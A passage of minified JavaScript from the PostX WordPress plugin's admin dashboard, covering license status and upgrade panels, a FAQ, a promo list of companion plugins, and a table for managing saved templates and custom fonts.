users.","ultimate-post")}),(0,a.createElement)(s,{licenseData:o,setLicenseData:i,setToastMessages:f}))))},l=({title:e,message:t})=>(0,a.createElement)("div",{className:"ultp-license-message"},(0,a.createElement)("div",{className:"ultp-license-message__icon"},(0,a.createElement)("svg",{xmlns:"http://www.w3.org/2000/svg",fill:"none",width:"48px",height:"46px",viewBox:"0 0 48 48"},(0,a.createElement)("g",{fill:"currentColor"},(0,a.createElement)("path",{d:"M46.15 26.76a.94.94 0 0 0-.39-1.27 14.7 14.7 0 0 0-16.21 1.62l-1.52-1.52 2.48-2.47a.94.94 0 0 0-1.33-1.33l-2.47 2.48-6.04-6.04a13.1 13.1 0 0 0 1.07-13.98.94.94 0 0 0-1.66.88c2.02 3.8 1.7 8.3-.75 11.76l-3.98-3.98a2.3 2.3 0 0 0-3.79.84L.14 44.9c-.3.86-.1 1.78.54 2.42a2.28 2.28 0 0 0 2.42.54l31.15-11.42a2.3 2.3 0 0 0 .84-3.8l-4.2-4.2a12.83 12.83 0 0 1 13.99-1.3.94.94 0 0 0 1.27-.38ZM14.93 41.52l-8.45-8.45 2.34-6.4 12.5 12.5-6.39 2.35Zm-4.58 1.68L4.8 37.65 5.77 35l7.22 7.22-2.64.97Zm-7.9 2.9A.4.4 0 0 1 2 46a.4.4 0 0 1-.1-.45l2.19-5.96 4.32 4.32-5.96 2.19Zm31.43-11.73a.41.41 0 0 1-.27.3l-5.77 2.12-5.33-5.33a.94.94 0 0 0-1.33 1.32l4.72 4.72-2.64.97L9.53 24.74l.97-2.64 4.72 4.72a.93.93 0 0 0 1.32 0 .94.94 0 0 0 0-1.33l-5.33-5.33 2.11-5.77c.07-.19.23-.25.31-.27h.1c.09 0 .2.02.3.12l19.73 19.73c.14.15.13.31.12.4ZM28.27 7.48c.52 0 .94-.42.94-.94 0-.78.64-1.42 1.43-1.42a3.3 3.3 0 0 0 3.3-3.3.94.94 0 0 0-1.88 0c0 .79-.64 1.43-1.42 1.43a3.3 3.3 0 0 0-3.3 3.3c0 .51.42.93.93.93ZM36.6 16.33c1.87 0 3.4-1.53 3.4-3.4 0-.85.69-1.54 1.53-1.54a.94.94 0 0 0 0-1.87 3.41 3.41 0 0 0-3.4 3.4c0 .85-.7 1.54-1.54 1.54a.94.94 0 0 0 0 1.87ZM42 18.14a3 3 0 1 0 6 0 3 3 0 0 0-6 0ZM45 17a1.13 1.13 0 1 1 0 2.26A1.13 1.13 0 0 1 45 17Z"}),(0,a.createElement)("path",{d:"M29.54 15.92a3 3 0 1 0 0-6 3 3 0 0 0 0 6Zm0-4.12a1.13 1.13 0 1 1 0 2.25 1.13 1.13 0 0 1 0-2.25ZM12 6a3 3 0 1 0 0-6 3 3 0 0 0 0 6Zm0-4.13a1.13 1.13 0 1 1 0 2.26 1.13 1.13 0 0 1 0-2.25ZM42.42 32.91a.94.94 0 0 0-1.32 1.33l.88.88a.93.93 0 0 0 1.33 0 .94.94 0 0 0 0-1.32l-.89-.89ZM46.84 37.33a.94.94 0 0 0-1.32 1.33l.88.88a.93.93 0 0 0 1.33 0 .94.94 0 0 0 0-1.33l-.89-.88ZM46.4 32.91l-.88.89a.94.94 0 0 0 1.32 1.32l.89-.88a.94.94 0 0 0-1.33-1.33ZM41.98 37.33l-.88.88a.94.94 0 0 0 1.32 1.33l.89-.88a.94.94 0 0 0-1.33-1.33ZM46.18 2.76c.24 0 .48-.1.66-.28l.89-.88A.94.94 0 1 0 46.4.27l-.88.89a.94.94 0 0 0 .66 1.6ZM41.76 7.18c.24 0 .48-.1.66-.28l.89-.88a.94.94 0 0 0-1.33-1.33l-.88.89a.94.94 0 0 0 .66 1.6ZM46.84 4.7a.94.94 0 0 0-1.32 1.32l.88.88a.93.93 0 0 0 1.33 0 .94.94 0 0 0 0-1.32l-.89-.89ZM41.98 2.48a.93.93 0 0 0 1.33 0 .94.94 0 0 0 0-1.32l-.89-.89A.94.94 0 0 0 41.1 1.6l.88.88ZM18.86 28.2a.94.94 0 0 0-.93.94.94.94 0 0 0 .93.93.94.94 0 0 0 .94-.93.94.94 0 0 0-.94-.94ZM32.54 18.43l-.68.68a.94.94 0 0 0 1.33 1.33l.68-.68a.94.94 0 0 0-1.33-1.33Z"})))),(0,a.createElement)("div",{className:"ultp-license-message__content"},(0,a.createElement)("div",{className:"ultp-license-message__title ultp-license-message-congrats"},e),(0,a.createElement)("div",{className:"ultp-license-message__text"},t))),s=({licenseData:e,setLicenseData:t,setToastMessages:n})=>{const[r,o]=(0,a.useState)(!1),i=async()=>{try{o(!0);const e=await l();t(e.license_data),n({status:"success",messages:[e?.data||"Some issues occured"],state:!0}),o(!1)}catch(e){n({status:"error",messages:[e.message||"Some issues occured"],state:!0}),o(!1)}},l=async()=>{const e=`${ultp_dashboard_pannel.ajax}`,t=new URLSearchParams({action:"edd_ultp_deactivate_license",security:ultp_dashboard_pannel.nonce,deactivate:"yes"}),n=await fetch(e,{method:"POST",body:t,headers:{"Content-Type":"application/x-www-form-urlencoded"}});if(!n.ok)throw new Error(`HTTP error! Status: ${n.status}`);const a=await n.json();if(a.status)return a};return(0,a.createElement)("div",{className:"ultp-license__status"},(0,a.createElement)("div",{className:"ultp-license__status-messages"},(0,a.createElement)("div",{className:"ultp-license__status-message"},(0,a.createElement)("div",{className:"ultp-license__status-message-label"},__("License Type","ultimate-post")),(0,a.createElement)("div",{className:"ultp-license__status-message-value"},e.licenseType)),(0,a.createElement)("div",{className:"ultp-license__status-message"},(0,a.createElement)("div",{className:"ultp-license__status-message-label"},__("Expire On","ultimate-post")),(0,a.createElement)("div",{className:"ultp-license__status-message-value"},e.expiresAt),(e?.toExpired||"expired"===e.license)&&(0,a.createElement)("a",{href:`https://account.wpxpo.com/checkout/?edd_license_key=${ultp_dashboard_pannel.license}&download_id=${e.itemId}&renew=1`,target:"_blank",rel:"noreferrer",className:"ultp-license__renew-link"},(0,a.createElement)("svg",{width:"20",height:"20",viewBox:"0 0 20 20",fill:"none",xmlns:"http://www.w3.org/2000/svg"},(0,a.createElement)("path",{d:"M2.86 6.553a.5.5 0 01.823-.482l3.02 2.745c.196.178.506.13.64-.098L9.64 4.779a.417.417 0 01.72 0l2.297 3.939a.417.417 0 00.64.098l3.02-2.745a.5.5 0 01.823.482l-1.99 8.63a.833.833 0 01-.813.646H5.663a.833.833 0 01-.812-.646L2.86 6.553z",stroke:"currentColor",strokeWidth:"1.5"})),__("Renew License","ultimate-post"))),(0,a.createElement)(p,{licenseData:e})),(0,a.createElement)("div",{className:"ultp-activate-btn ultp_license_action_btn",onClick:()=>i(),role:"button",tabIndex:-1,onKeyDown:e=>{"Enter"===e.key&&i()}},(0,a.createElement)("div",null,__("Deactivate License","ultimate-post")),r&&(0,a.createElement)("span",{className:"ultp-activate-loading"})))},p=({licenseData:e})=>{const[t,n]=(0,a.useState)(""),r={1:__("5 Sites - Yearly","ultimate-post"),2:__("Unlimited Sites - Yearly","ultimate-post"),3:__("1 Site - Lifetime","ultimate-post"),4:__("5 Sites - Lifetime","ultimate-post"),5:__("Unlimited Sites - Lifetime","ultimate-post")},o={1:[1,2,3,4,5],7:[2,3,4,5],2:[4,5],4:[2,4,5],5:[5]}[e?.priceId];return o&&0!==o.length?(0,a.createElement)("div",{className:"ultp-license__upgrade-message"},(0,a.createElement)("div",{className:"ultp-license__upgrade-message-title"},(0,a.createElement)("label",{htmlFor:"ultp-license-select"},__("Choose a upgrade plan","ultimate-post")),(0,a.createElement)("select",{id:"ultp-license-select",value:t,onChange:e=>{n(e.target.value)}},o.map((e=>(0,a.createElement)("option",{key:e,value:e},r[e]))))),(0,a.createElement)("a",{className:"ultp-license__upgrade-link",href:`https://account.wpxpo.com/checkout/?edd_action=sl_license_upgrade&license_key=${ultp_dashboard_pannel.license}&upgrade_id=${t||o[0]}`,target:"_blank",rel:"noreferrer"},__("Upgrade Now","ultimate-post"))):null},c=({width:e="100%",height:t="1rem",borderRadius:n="4px",style:r={}})=>(0,a.createElement)("div",{className:"ultp-custom-skeleton-loader",style:{width:e,height:t,borderRadius:n,...r}}),d=[{question:__("Do I need the free version of the plugin on my site?","ultimate-post"),answer:__("Yes. You can use the free version of the plugin, which includes the free features of PostX. However, please note that to use the pro features, you need the free version of the plugin installed on your WordPress site.","ultimate-post")},{question:__("Where do I get my product license?","ultimate-post"),answer:__("You can copy the product license from the client dashboard. Once you copy it, paste the license key into the PostX License validation page.","ultimate-post")},{question:__("How do I get help to use PostX Pro?","ultimate-post"),hasMarkup:!0,answer:__("Please go to the support link: <a href='https://www.wpxpo.com/contact/.' target='_blank'>www.wpxpo.com/contact</a>","ultimate-post")}],u=()=>(0,a.createElement)("div",{className:"ultp-license__faq"},d.map(((e,t)=>(0,a.createElement)("div",{key:t,className:"ultp-license-faq__item"},(0,a.createElement)("div",{className:"ultp-license-faq__question"},e.question),e.hasMarkup?(0,a.createElement)("div",{className:"ultp-license-faq__answer",dangerouslySetInnerHTML:{__html:e.answer}}):(0,a.createElement)("div",{className:"ultp-license-faq__answer"},e.answer)))),(0,a.createElement)("div",{className:"ultp-license-faq-item"},__("PostX is a product of WPXPO. The contact support team is ready to help you with any queries, including how to use the pro version of PostX.","ultimate-post")))},3701:(e,t,n)=>{"use strict";n.d(t,{I:()=>l});var a=n(7294),r=n(1383);n(7376);const{__}=wp.i18n,o={wholesale_x:(0,a.createElement)("svg",{xmlns:"http://www.w3.org/2000/svg",width:"40",height:"40",fill:"none",viewBox:"0 0 48 48"},(0,a.createElement)("path",{fill:"#FEAD01",d:"M22.288 5.44498 11.1095 7.77499c-.6634.13829-1.0892.78825-.9509 1.45173l2.33 11.17848c.1383.6635.7883 1.0892 1.4517.9509l11.1785-2.33c.6635-.1383 1.0892-.7882.9509-1.4517l-2.33-11.1785c-.1383-.66347-.7882-1.08921-1.4517-.95092Zm3.1934 15.32522-11.1785 2.33c-.6635.1383-1.0892.7882-.9509 1.4517l2.33 11.1785c.1383.6635.7882 1.0892 1.4517.9509l11.1785-2.33c.6635-.1383 1.0892-.7883.9509-1.4517l-2.33-11.1785c-.1383-.6635-.7883-1.0892-1.4517-.9509ZM37.6161 2.25064 26.4377 4.58065c-.6635.1383-1.0893.78826-.951 1.45173l2.33 11.17852c.1383.6634.7883 1.0892 1.4518.9509l11.1784-2.33c.6635-.1383 1.0893-.7883.951-1.4518l-2.33-11.17843c-.1383-.66348-.7883-1.08922-1.4518-.95093Zm3.1934 15.32716-11.1785 2.33c-.6635.1383-1.0892.7883-.9509 1.4517l2.33 11.1785c.1383.6635.7883 1.0892 1.4517.9509l11.1785-2.33c.6635-.1383 1.0892-.7882.9509-1.4517l-2.33-11.1785c-.1383-.6635-.7882-1.0892-1.4517-.9509Z"}),(0,a.createElement)("path",{fill:"#6C6CFF",d:"M11.4509 35.4957c-.2235-.0003-.4402-.0776-.6136-.2187-.1734-.1412-.293-.3377-.3386-.5566L4.40205 5.44687c-.0671-.32174-.25914-.60372-.53395-.784-.27481-.18029-.60992-.24415-.93177-.17757-.15961.03288-.31112.09709-.44576.18889-.13464.09181-.24976.20939-.33867.34596-.08986.13594-.15175.2884-.1821.4485-.03036.16011-.02855.32465.00531.48404l.47956 2.30076c.05267.25283.00277.51622-.13875.73225-.14152.21603-.36305.367-.61587.41971-.12518.0261-.25429.02728-.37992.00348-.12564-.0238-.24534-.07212-.352302-.1422-.106958-.07007-.199074-.16054-.271063-.26622-.071988-.10568-.122425-.22451-.14848-.3497L.0686777 6.35002c-.0868909-.41-.0913681-.83319-.0132214-1.24494.0781467-.41176.2373657-.80387.4684307-1.15352.228483-.35063.524233-.65249.870113-.8881.34589-.23562.73506-.40032 1.145-.48457.8274-.1712 1.68888-.00722 2.39554.45595.70665.46317 1.20075 1.18772 1.3739 2.01471L12.4051 34.3231c.0294.1417.0269.2883-.0074.4289s-.0996.2719-.1909.3842c-.0914.1122-.2067.2028-.3374.2649-.1307.0622-.2737.0944-.4185.0944v.0002Zm8.49 5.5912c-.2408-.0005-.4729-.0901-.6515-.2515-.1786-.1615-.291-.3834-.3156-.623-.0245-.2395.0404-.4796.1825-.674.1421-.1944.3511-.3293.5868-.3786l27.0841-5.6452c.2528-.0527.5162-.0028.7322.1387.216.1415.3669.3631.4196.6159.0527.2528.0028.5162-.1387.7322-.1415.216-.363.3669-.6158.4196l-27.0841 5.6452c-.0656.0136-.1325.0205-.1995.0207Z"}),(0,a.createElement)("path",{fill:"#070C1A",d:"M12.8922 45.9671c-.8322-.0016-1.647-.2389-2.3499-.6845-.70286-.4456-1.26512-1.0812-1.62162-1.8332-.35651-.752-.49266-1.5896-.39269-2.4158.09996-.8262.43196-1.6072.95753-2.2525.52558-.6452 1.22318-1.1284 2.01208-1.3935.7889-.2651 1.6367-.3012 2.4453-.1043.8086.197 1.5448.619 2.1234 1.2172.5786.5981.9759 1.348 1.1458 2.1627.2383 1.1434.0126 2.3345-.6273 3.3115-.64.977-1.6418 1.6597-2.7852 1.898-.2984.0625-.6025.0941-.9074.0944Zm.014-6.8621c-.1701 0-.3398.0176-.5062.0525-.4757.099-.9113.3369-1.2518.6835-.3404.3467-.5704.7865-.6609 1.2638-.0905.4774-.0374.9708.1525 1.418.19.4472.5083.828.9147 1.0943.4064.2663.8826.4061 1.3684.4017.4859-.0044.9595-.1527 1.361-.4263.4015-.2735.7129-.66.8948-1.1105.1819-.4505.2261-.9449.127-1.4205-.1152-.5517-.4164-1.047-.8533-1.403-.4368-.3561-.9827-.5512-1.5462-.5528v-.0007Z"})),wow_store:(0,a.createElement)("svg",{xmlns:"http://www.w3.org/2000/svg",width:"40",height:"40",fill:"none",viewBox:"0 0 48 48"},(0,a.createElement)("path",{fill:"#FF176B",d:"M33.4798 8.9711 48 0l-7.1908 32.9249-4.4393 5.9884H4.9711L0 32.9249l3.90751-17.9654 8.76299 2.9827-2.6127 11.9769h6.289l3.9307-17.9653h9.4335l-3.9307 17.9653h6.2891l4.578-20.948h-3.1676ZM9.98852 48.0005c1.66478 0 2.98268-1.3411 2.98268-2.9827s-1.3411-2.9826-2.98268-2.9826c-1.64162 0-2.98266 1.341-2.98266 2.9826 0 1.6416 1.34104 2.9827 2.98266 2.9827Zm15.67578 0c1.6416 0 2.9827-1.3411 2.9827-2.9827s-1.3411-2.9826-2.9827-2.9826-2.9827 1.341-2.9827 2.9826c0 1.6416 1.3411 2.9827 2.9827 2.9827Z"})),wow_revenue:(0,a.createElement)("svg",{xmlns:"http://www.w3.org/2000/svg",width:"40",height:"40",fill:"none",viewBox:"0 0 48 48"},(0,a.createElement)("path",{fill:"#00A464",d:"M47.9999 47.9999H36L24 0h12l11.9999 47.9999Zm-12 0H24L12 15.96h12l11.9999 32.0399Zm-12 .0001H12L0 32.04h12L23.9999 48Z"})),wow_optin:(0,a.createElement)("svg",{xmlns:"http://www.w3.org/2000/svg",width:"40",height:"40",fill:"none",viewBox:"0 0 48 48"},(0,a.createElement)("g",{fill:"#F97415",clipPath:"url(#optin_48_path)"},(0,a.createElement)("path",{d:"M28.7992 24.0373c0-2.6419-2.1581-4.8-4.8-4.8-2.6418 0-4.8 2.1581-4.8 4.8 0 2.6419 2.1582 4.8 4.8 4.8 2.6419 0 4.8-2.1581 4.8-4.8Z"}),(0,a.createElement)("path",{d:"M24 48.0372v-9.6c7.9256 0 14.4-6.4744 14.4-14.4S31.9256 9.63721 24 9.63721 9.6 16.1116 9.6 24.0372H0C0 10.7907 10.7535 0 24 0s24 10.7535 24 24-10.7535 24-24 24v.0372Z"}),(0,a.createElement)("path",{d:"m19.2 28.8369-19.2 6.4 8.8186 3.9814L12.8 48.0369l6.4372-19.2H19.2Z"})),(0,a.createElement)("defs",null,(0,a.createElement)("clipPath",{id:"optin_48_path"},(0,a.createElement)("path",{fill:"#fff",d:"M0 0h48v48H0z"})))),wow_addon:(0,a.createElement)("svg",{xmlns:"http://www.w3.org/2000/svg",width:"40",height:"40",fill:"none",viewBox:"0 0 32 32"},(0,a.createElement)("rect",{width:"14.12",height:"14.12",x:"1",y:"16.88",fill:"#86A62C",rx:"3.53"}),(0,a.createElement)("rect",{width:"14.12",height:"14.12",x:"16.88",y:"1",fill:"#86A62C",rx:"3.53"}),(0,a.createElement)("path",{fill:"#86A62C",fillRule:"evenodd",d:"M1.38 2.93C1 3.68 1 4.67 1 6.65v2.82c0 1.98 0 2.97.38 3.72.34.66.88 1.2 1.55 1.54.75.39 1.74.39 3.72.39h2.82c1.98 0 2.97 0 3.72-.39.66-.34 1.2-.88 1.54-1.54.39-.75.39-1.74.39-3.72V6.65c0-1.98 0-2.97-.39-3.72a3.53 3.53 0 0 0-1.54-1.55C12.44 1 11.45 1 9.47 1H6.65c-1.98 0-2.97 0-3.72.38-.67.34-1.2.88-1.55 1.55Zm5.98 8.62 5.73-5.73-1.24-1.25-5.11 5.1-2.47-2.46-1.25 1.25 3.1 3.09c.34.34.9.34 1.24 0ZM16.88 22.53c0-1.98 0-2.97.39-3.72.34-.66.88-1.2 1.54-1.54.75-.39 1.74-.39 3.72-.39h2.82c1.98 0 2.97 0 3.72.39.67.34 1.2.88 1.55 1.54.38.75.38 1.74.38 3.72v2.82c0 1.98 0 2.97-.38 3.72-.34.67-.88 1.2-1.55 1.55-.75.38-1.74.38-3.72.38h-2.82c-1.98 0-2.97 0-3.72-.38a3.53 3.53 0 0 1-1.54-1.55c-.39-.75-.39-1.74-.39-3.72v-2.82Zm6.18.53v-3.09h1.76v3.09h3.1v1.76h-3.1v3.1h-1.76v-3.1h-3.09v-1.76h3.09Z",clipRule:"evenodd"}))},i={wholesale_x:{title:"WholesaleX",subtitle:`WholesaleX \n        ${__("is a B2B wholesale plugin featuring advanced wholesale pricing and customization features.","ultimate-post")}`,install:"installation url",pluginUrl:"https://getwholesalex.com/"},wow_store:{title:"WowStore",subtitle:`WowStore ${__("is a complete WooCommerce store builder featuring advanced options to improve sales!","ultimate-post")}`,install:"installation url",pluginUrl:"https://www.wpxpo.com/wowstore/"},wow_revenue:{title:"WowRevenue",subtitle:`WowRevenue ${__("boost sales and maximize revenue with the advanced discount campaigns of WowRevenue.","ultimate-post")}`,install:"installation url",pluginUrl:"https://www.wowrevenue.com/"},wow_optin:{title:"WowOptin",subtitle:`WowOptin ${__("generates actionable leads and boost sales with popups, banners, and floating bars using WowOptin.","ultimate-post")}`,install:"installation url",pluginUrl:"https://www.wowoptin.com/"},wow_addon:{title:"WowAddons",subtitle:`WowAddons ${__("extends the functionality of your WooCommerce store with additional features and options.","ultimate-post")}`,install:"installation url",pluginUrl:"https://www.wpxpo.com/product-addons-for-woocommerce/"}},l=()=>{const[e,t]=(0,a.useState)({}),[n,l]=(0,a.useState)(ultp_dashboard_pannel.products||{}),[s,p]=(0,a.useState)(!1),[c,d]=(0,a.useState)(ultp_dashboard_pannel.products_active||{}),u=e=>{t((t=>({...t,[e]:!0})));const n=new FormData;n.append("action","ultp_install_plugin"),n.append("wpnonce",ultp_dashboard_pannel.security),n.append("plugin",e),fetch(ultp_dashboard_pannel.ajax,{method:"POST",body:n}).then((e=>e.json())).then((()=>{})).catch((()=>{})).finally((()=>{t((t=>({...t,[e]:!1}))),l((t=>({...t,[e]:!0}))),d((t=>({...t,[e]:!0})))}))},m=(0,r.t)();return(0,a.useEffect)((()=>{p(!0),setTimeout((()=>{m.current&&p(!1)}),1e3)}),[]),(0,a.createElement)("div",{className:"ultp-plugins-wrapper"},(0,a.createElement)("div",{className:"ultp-plugin-items"},Object.keys(i).map(((t,r)=>((t,r)=>{const l=o[t]||null;return(0,a.createElement)("div",{key:r,className:"ultp-plugin-item"},(0,a.createElement)("div",{className:"ultp-plugin-item-title"},(0,a.createElement)("div",{className:"ultp-product-icon"},l),i[t].title),(0,a.createElement)("div",{className:"ultp-plugin-item-desc"},i[t].subtitle),(0,a.createElement)("div",{className:"ultp-plugin-item-action"},(0,a.createElement)(a.Fragment,null,c[t]?(0,a.createElement)("div",{className:"ultp-secondary-button ultp-activated-button"},__("Activated","ultimate-post")):(0,a.createElement)("div",{className:"ultp-secondary-button ultp-plugin-active-btn",onClick:()=>u(t),role:"button",tabIndex:-1,onKeyDown:e=>{"Enter"===e.key&&u(t)}},(0,a.createElement)("div",null,n[t]?__("Activate","ultimate-post"):__("Install","ultimate-post")),e[t]&&(0,a.createElement)("span",{className:"ultp-plugin-item-loading"}))),(0,a.createElement)("div",{className:"ultp-transparent-alter-button",role:"button",tabIndex:-1,onClick:()=>window.open(i[t].pluginUrl,"_blank"),onKeyDown:e=>{"Enter"===e.key&&window.open(i[t].pluginUrl,"_blank")}},__("Plugin Details","ultimate-post"))))})(t,r)))))}},5957:(e,t,n)=>{"use strict";n.d(t,{Z:()=>s});var a=n(7294),r=n(356),o=n(4766),i=n(4482),l=n(8949);n(6680);const{__}=wp.i18n,s=e=>{const[t,n]=(0,a.useState)([]),[s,p]=(0,a.useState)(!1),[c,d]=(0,a.useState)(1),[u,m]=(0,a.useState)(0),[f,h]=(0,a.useState)(""),[g,v]=(0,a.useState)(0),[_,w]=(0,a.useState)(!1),[b,x]=(0,a.useState)(""),[y,k]=(0,a.useState)([]),[E,C]=(0,a.useState)(""),[S,M]=(0,a.useState)(!1),[L,N]=(0,a.useState)({state:!1,status:""}),[Z,P]=(0,a.useState)(!1);(0,a.useEffect)((()=>(z(),document.addEventListener("mousedown",B),()=>document.removeEventListener("mousedown",B))),[]);const z=(t={})=>{A({action:"dashborad",data:Object.assign({},{type:"saved_templates",pages:c,pType:e.type},t)})},A=e=>{wp.apiFetch({path:"/ultp/v2/"+e.action,method:"POST",data:e.data}).then((t=>{if(t.success)switch(e.data.type){case"saved_templates":k(Array(t.data.length).fill(!1)),n(t.data),p(!(t.data.length>0)),h(t.new),m(t.found),v(t.pages),x(""),w(!1),e.data.search&&d(1);break;case"status":case"delete":case"duplicate":case"action_draft":case"action_delete":case"action_publish":z(),w(!1),N({status:e.data.type.includes("delete")?"error":"success",messages:[t.message],state:!0})}}))},B=e=>{e.target.parentNode.classList.contains("ultp-reserve-button")||(C(""),M(!1))};return(0,a.createElement)("div",{className:`ultp-${"ultp_templates"==e.type?"saved-template":"custom-font"}-container`},L.state&&(0,a.createElement)(r.Z,{delay:2e3,toastMessages:L,setToastMessages:N}),f?(0,a.createElement)(a.Fragment,null,"ultp_templates"==e.type&&!ultp_dashboard_pannel.active&&t?.length>0?(0,a.createElement)("a",{className:"ultp-primary-button cursor",onClick:()=>P(!0)},__("Add New","ultimate-post")):(0,a.createElement)(a.Fragment,null,(0,a.createElement)("a",{className:"ultp-primary-button ",target:"_blank",href:f,rel:"noreferrer"},__("Add New","ultimate-post")))):(0,a.createElement)(l.Z,{type:"custom_size",c_s:{size1:108,unit1:"px",size2:46,unit2:"px",br:4}}),(0,a.createElement)("div",{className:"tableCon"},(0,a.createElement)("div",{className:"ultp-bulk-con ultp-dash-item-con"},(0,a.createElement)("div",null,(0,a.createElement)("select",{value:b,onChange:e=>x(e.target.value)},(0,a.createElement)("option",{value:""},__("Bulk Action","ultimate-post")),(0,a.createElement)("option",{value:"publish"},__("Publish","ultimate-post")),(0,a.createElement)("option",{value:"draft"},__("Draft","ultimate-post")),(0,a.createElement)("option",{value:"delete"},__("Delete","ultimate-post"))),(0,a.createElement)("a",{className:"ultp-primary-button cursor",onClick:()=>{const e=y.filter((e=>Number.isInteger(e)));b&&e.length>0&&("delete"==b?confirm("Are you sure you want to apply the action?")&&A({action:"dashborad",data:{type:"action_"+b,ids:e}}):A({action:"dashborad",data:{type:"action_"+b,ids:e}}))}},__("Apply","ultimate-post"))),(0,a.createElement)("input",{type:"text",placeholder:"Search...",onChange:e=>{z({search:e.target.value})}})),(0,a.createElement)("div",{className:"ultpTable"},(0,a.createElement)("table",{className:0!=t.length||s?"":"skeletonOverflow"},(0,a.createElement)("thead",null,(0,a.createElement)("tr",null,(0,a.createElement)("th",null,(0,a.createElement)("input",{type:"checkbox",checked:_,onChange:e=>{k(_?Array(t.length).fill(!1):t.map((e=>e.id))),w(!_)}})),(0,a.createElement)(a.Fragment,null,"ultp_templates"==e.type?(0,a.createElement)(a.Fragment,null,(0,a.createElement)("th",{className:"title"},__("Title","ultimate-post")),(0,a.createElement)("th",null,__("Shortcode","ultimate-post"))):(0,a.createElement)(a.Fragment,null,(0,a.createElement)("th",{className:"title"},__("Font Family","ultimate-post")),(0,a.createElement)("th",{className:"fontpreview"},__("Preview","ultimate-post")),(0,a.createElement)("th",{className:"fontType"},__("WOFF","ultimate-post")),(0,a.createElement)("th",{className:"fontType"},__("WOFF2","ultimate-post")),(0,a.createElement)("th",{className:"fontType"},__("TTF","ultimate-post")),(0,a.createElement)("th",{className:"fontType"},__("SVG","ultimate-post")),(0,a.createElement)("th",{className:"fontType"},__("EOT","ultimate-post"))),(0,a.createElement)("th",{className:"dateHead"},__("Date","ultimate-post")),(0,a.createElement)("th",null,__("Action","ultimate-post"))))),(0,a.createElement)("tbody",null,t?.map(((t,n)=>(0,a.createElement)("tr",{key:n},(0,a.createElement)("td",null,(0,a.createElement)("input",{type:"checkbox",checked:!!y[n],onChange:()=>{const e=[...y];e.splice(n,1,!y[n]&&t.id),k(e)}})),(t=>{let n="",r={fontFamily:"",fontWeight:""};if("ultp_templates"!=e.type&&t?.font_settings?.length>0){const e=t.font_settings[0],a=[];e.woff&&a.push(`url(${e.woff}) format('woff')`),e.woff2&&a.push(`url(${e.woff2}) format('woff2')`),e.ttf&&a.push(`url(${e.ttf}) format('TrueType')`),e.svg&&a.push(`url(${e.svg}) format('svg')`),e.eot&&a.push(`url(${e.eot}) format('eot')`),n+=` @font-face {\n                font-family: "${t.title}";\n                font-weight: ${e.weight};\n                font-display: auto;\n                src: ${a.join(", ")};\n            } `,r={fontFamily:t.title,fontWeight:e.weight}}return(0,a.createElement)(a.Fragment,null,"ultp_templates"==e.type?(0,a.createElement)(a.Fragment,null,(0,a.createElement)("td",{className:"title"},(0,a.createElement)("a",{href:t?.edit?.replace("&amp;","&"),target:"_blank",rel:"noreferrer"},t.title||"Untitled")),(0,a.createElement)("td",null,(0,a.createElement)("span",{className:"shortCode",onClick:e=>{(e=>{let t=!1;if(navigator.clipboard)t=navigator.clipboard.writeText(e.target.innerHTML);else{const n=document.createElement("input");n.setAttribute("value",e.target.innerHTML),document.body.appendChild(n),n.select(),t=document.execCommand("copy"),document.body.removeChild(n)}if(t){const t=document.createElement("span");t.innerText="Copied!",e.target.appendChild(t),setTimeout((()=>{e.target.removeChild(t)}),800)}})(e)}},'[postx_template id="',t.id,'"]'))):(0,a.createElement)(a.Fragment,null,(0,a.createElement)("td",{className:"title"},(0,a.createElement)("a",{href:t?.edit?.replace("&amp;","&"),target:"_blank",rel:"noreferrer"},t.title||"Untitled")),t.title&&(0,a.createElement)("style",{type:"text/css"},n),(0,a.createElement)("td",{style:r},__("The quick brown fox jumps over the lazy dog.","ultimate-post")),(0,a.createElement)("td",{className:"fontType"},(0,a.createElement)("span",{className:"dashicons "+(t.woff?"dashicons-yes":"dashicons-no-alt")})),(0,a.createElement)("td",{className:"fontType"},(0,a.createElement)("span",{className:"dashicons "+(t.woff2?"dashicons-yes":"dashicons-no-alt")})),(0,a.createElement)("td",{className:"fontType"},(0,a.createElement)("span",{className:"dashicons "+(t.ttf?"dashicons-yes":"dashicons-no-alt")})),(0,a.createElement)("td",{className:"fontType"},(0,a.createElement)("span",{className:"dashicons "+(t.svg?"dashicons-yes":"dashicons-no-alt")})),(0,a.createElement)("td",{className:"fontType"},(0,a.createElement)("span",{className:"dashicons "+(t.eot?"dashicons-yes":"dashicons-no-alt")}))))})(t),(0,a.createElement)("td",{className:"typeDate"},"publish"==t.status?"Published":t.status," ",(0,a.createElement)("br",null),t.date),(0,a.createElement)("td",null,(0,a.createElement)("span",{className:"actions ultp-reserve-button",onClick:e=>{M(!S),C(t.id)}},(0,a.createElement)("span",{className:"dashicons dashicons-ellipsis"}),E==t.id&&S&&(0,a.createElement)("ul",{className:"ultp-dash-item-con actionPopUp ultp-reserve-button"},(0,a.createElement)("li",{className:"ultp-reserve-button"},(0,a.createElement)("a",{target:"_blank",href:t?.edit?.replace("&amp;","&"),rel:"noreferrer"},(0,a.createElement)("span",{className:"dashicons dashicons-edit-large"}),__("Edit","ultimate-post"))),(0,a.createElement)("li",{onClick:e=>{C(""),M(!1),e.preventDefault(),confirm("Are you sure?")&&A({action:"template_action",data:{type:"status",id:t.id,status:"publish"==t.status?"draft":"publish"}})}},(0,a.createElement)("span",{className:"dashicons dashicons-open-folder"}),__("Set to","ultimate-post")," ","draft"==t.status?"Publish":"Draft"),(0,a.createElement)("li",{onClick:e=>{C(""),M(!1),e.preventDefault(),confirm("Are you sure you want to delete?")&&A({action:"template_action",data:{type:"delete",id:t.id}})}},(0,a.createElement)("span",{className:"dashicons dashicons-trash"}),__("Delete","ultimate-post")),"ultp_templates"==e.type&&(0,a.createElement)("li",{onClick:e=>{C(""),M(!1),e.preventDefault(),confirm("Are you sure you want to duplicate this template?")&&A({action:"template_action",data:{type:"duplicate",id:t.id}})}},(0,a.createElement)("span",{className:"dashicons dashicons-admin-page"}),__("Duplicate","ultimate-post")))))))),0==t.length&&s&&(0,a.createElement)("tr",null,"ultp_templates"==e.type?(0,a.createElement)("td",{colSpan:5},(0,a.createElement)("div",{className:"ultp_h2"},__("No Data Found !!!","ultimate-post"))):(0,a.createElement)("td",{colSpan:10},(0,a.createElement)("div",{className:"ultp_h2"},__("No Data Found 